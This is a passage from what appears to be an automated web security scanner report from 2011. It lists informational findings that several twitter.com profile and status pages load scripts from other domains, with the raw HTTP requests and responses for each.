User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-365-19064
ETag: "fe6b40f83a3db7f038fdf6a1c2da2712"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.01247
Content-Type: text/html; charset=utf-8
Content-Length: 50661
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.510. http://twitter.com/miketaylr

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /miketaylr

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /miketaylr HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:03 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234603-91434-31335
ETag: "7fbf0a40428e7c6c9f63b9ea7ee047da"
Last-Modified: Fri, 28 Jan 2011 17:10:03 GMT
X-Runtime: 0.01243
Content-Type: text/html; charset=utf-8
Content-Length: 51101
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.511. http://twitter.com/miketaylr/status/28450462860574722

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /miketaylr/status/28450462860574722

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /miketaylr/status/28450462860574722 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:30:15 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296225015-87669-41148
ETag: "0614e68a07b236446d991d175287ff76"
Last-Modified: Fri, 28 Jan 2011 14:30:15 GMT
X-Runtime: 0.06100
Content-Type: text/html; charset=utf-8
Content-Length: 13700
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CjoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoMY3NyZl9pZCIlODgzNDE0MmFh%250AYjIxNmFlNTQzYjMzMTE1YjIwN2I2OTg6B2lkIiUxYzk1MzQ4MWE0MmZkZTlj%250AMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6%250ARmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO%250A8MwtAQ%253D%253D--7486f8d612e6b798f03b8c042950cee765d57f1e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.512. http://twitter.com/miketaylr/status/28450462860574722

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /miketaylr/status/28450462860574722

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /miketaylr/status/28450462860574722 HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:10:10 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234610-82897-34440
ETag: "e01bb78e27fd3f7a23d32a15b2cfb024"
Last-Modified: Fri, 28 Jan 2011 17:10:10 GMT
X-Runtime: 0.04297
Content-Type: text/html; charset=utf-8
Content-Length: 13569
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7DDoOcmV0dXJuX3RvIjpodHRwOi8vdHdpdHRlci5jb20vbWlrZXRheWxy%250AL3N0YXR1cy8yODQ1MDQ2Mjg2MDU3NDcyMjoVaW5fbmV3X3VzZXJfZmxvdzA6%250ADGNzcmZfaWQiJWFiYzQ1NWM5YjQ1NWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0%250Ael9uYW1lIhRDZW50cmFsIEFtZXJpY2E6D2NyZWF0ZWRfYXRsKwgzTvDMLQE6%250AB2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxhc2hJ%250AQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVz%250AZWR7AA%253D%253D--f6f660c8de153bf735aca570942f67109c3ca923; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.513. http://twitter.com/moxiesoft

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /moxiesoft

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:16:24 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224184-1250-55880
ETag: "c8b3c0b1df873136d3d1cad3c8b419ff"
Last-Modified: Fri, 28 Jan 2011 14:16:24 GMT
X-Runtime: 0.01726
Content-Type: text/html; charset=utf-8
Content-Length: 51386
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: k=173.193.214.243.1296224183777646; path=/; expires=Fri, 04-Feb-11 14:16:23 GMT; domain=.twitter.com
Set-Cookie: guest_id=129622418451783185; path=/; expires=Sun, 27 Feb 2011 14:16:24 GMT
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTRmYjYzZDBkM2FhODQ0MWJmMjI2Y2RiMWRmZjM2NDlmIgpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIyGj7zC0B--83af79b56916b6955fc5a806bee986cc03de516e; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/twitter.js?1296182903" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182903" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182903" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/geov1.js?1296182903" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/api.js?1296182903" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182903" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/dismissable.js?1296182903" type="text/javascript"></script>
...[SNIP]...

18.514. http://twitter.com/moxiesoft

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /moxiesoft

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /moxiesoft HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:06:07 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234367-88995-55309
ETag: "fe7d0cb97679598c86f9ca6115e84b3f"
Last-Modified: Fri, 28 Jan 2011 17:06:07 GMT
X-Runtime: 0.01530
Content-Type: text/html; charset=utf-8
Content-Length: 51255
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2E6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3OTFmMmY2NCIKZmxh%250Ac2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoK%250AQHVzZWR7ADoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--1fee8dfc989eabd14b8fe40bb5047ae7f4f0da07; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/dismissable.js?1296181726" type="text/javascript"></script>
...[SNIP]...

18.515. http://twitter.com/onlyjazz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /onlyjazz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; guest_id=129452629042599503; auth_token=; _twitter_sess=BAh7CCIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsABjoKQHVzZWR7ADoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVk%250ANTc5MWYyZjY0Og9jcmVhdGVkX2F0bCsIM07wzC0B--b07cff8e17f75f868357b2ca3686bee771bb3a61; k=173.193.214.243.1295994766153789;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 14:28:40 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296224920-98437-32805
ETag: "a870c25d2bf45fd1f02dca10a6c09b7f"
Last-Modified: Fri, 28 Jan 2011 14:28:40 GMT
X-Runtime: 0.00899
Content-Type: text/html; charset=utf-8
Content-Length: 49524
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CDoHaWQiJTFjOTUzNDgxYTQyZmRlOWMwYzc0YWVkNTc5MWYyZjY0Igpm%250AbGFzaElDOidBY3Rpb25Db250cm9sbGVyOjpGbGFzaDo6Rmxhc2hIYXNoewAG%250AOgpAdXNlZHsAOg9jcmVhdGVkX2F0bCsIM07wzC0B--576140db2faf89053449b73950d6637ee0473475; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/twitter.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296182306" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296182306" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/geov1.js?1296182306" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/api.js?1296182306" type="text/javascript"></script>
...[SNIP]...
</script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296182306" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/dismissable.js?1296182306" type="text/javascript"></script>
...[SNIP]...

18.516. http://twitter.com/onlyjazz

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /onlyjazz

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /onlyjazz HTTP/1.1
Host: twitter.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: original_referer=OTZIBTkFw3vZjuP4Il%2FETHEMNaG1XwXa; __utmv=43838368.lang%3A%20en; guest_id=129452629042599503; __utmz=43838368.1296232506.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/24; tz_offset_sec=-21600; __utma=43838368.1078689092.1296223511.1296223511.1296232506.2; auth_token=; __utmc=43838368; _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgx0el9uYW1lIhRDZW50cmFsIEFtZXJp%250AY2EiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhh%250Ac2h7AAY6CkB1c2VkewA6B2lkIiUxYzk1MzQ4MWE0MmZkZTljMGM3NGFlZDU3%250AOTFmMmY2NDoPY3JlYXRlZF9hdGwrCDNO8MwtAQ%253D%253D--7dcad2860e47342f7b7e17312d3dafb1ebda0ee1; __utmb=43838368.3.10.1296232506; k=173.193.214.243.1296227675375304;

Response

HTTP/1.0 200 OK
Date: Fri, 28 Jan 2011 17:08:55 GMT
Server: hi
Status: 200 OK
X-Transaction: 1296234535-70662-50680
ETag: "f52a0a58560fb29dddf78f5b8f984397"
Last-Modified: Fri, 28 Jan 2011 17:08:55 GMT
X-Runtime: 0.01601
Content-Type: text/html; charset=utf-8
Content-Length: 49398
Pragma: no-cache
X-Revision: DEV
Expires: Tue, 31 Mar 1981 05:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate, pre-check=0, post-check=0
Set-Cookie: auth_token=; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _twitter_sess=BAh7CzoVaW5fbmV3X3VzZXJfZmxvdzA6DGNzcmZfaWQiJWFiYzQ1NWM5YjQ1%250ANWJjMzdkMGZkMjlmMjZhNWUzMTFjOgdpZCIlMWM5NTM0ODFhNDJmZGU5YzBj%250ANzRhZWQ1NzkxZjJmNjQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZs%250AYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA6D2NyZWF0ZWRfYXRsKwgzTvDM%250ALQE6DHR6X25hbWUiFENlbnRyYWwgQW1lcmljYQ%253D%253D--cfd12ccdf4950b48b8bfd5a21dc805af5732a2dc; domain=.twitter.com; path=/
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Vary: Accept-Encoding
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta htt
...[SNIP]...
</div>


<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.0/jquery.min.js" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/twitter.js?1296181726" type="text/javascript"></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/jquery.tipsy.min.js?1296181726" type="text/javascript"></script>
<script type='text/javascript' src='http://www.google.com/jsapi'></script>
<script src="http://a1.twimg.com/a/1296179758/javascripts/lib/gears_init.js?1296181726" type="text/javascript"></script>
<script src="http://a2.twimg.com/a/1296179758/javascripts/lib/mustache.js?1296181726" type="text/javascript"></script>
<script src="http://a3.twimg.com/a/1296179758/javascripts/geov1.js?1296181726" type="text/javascript"></script>
<script src="http://a0.twimg.com/a/1296179758/javascripts/api.js?1296181726" type="text/javascript"></script>
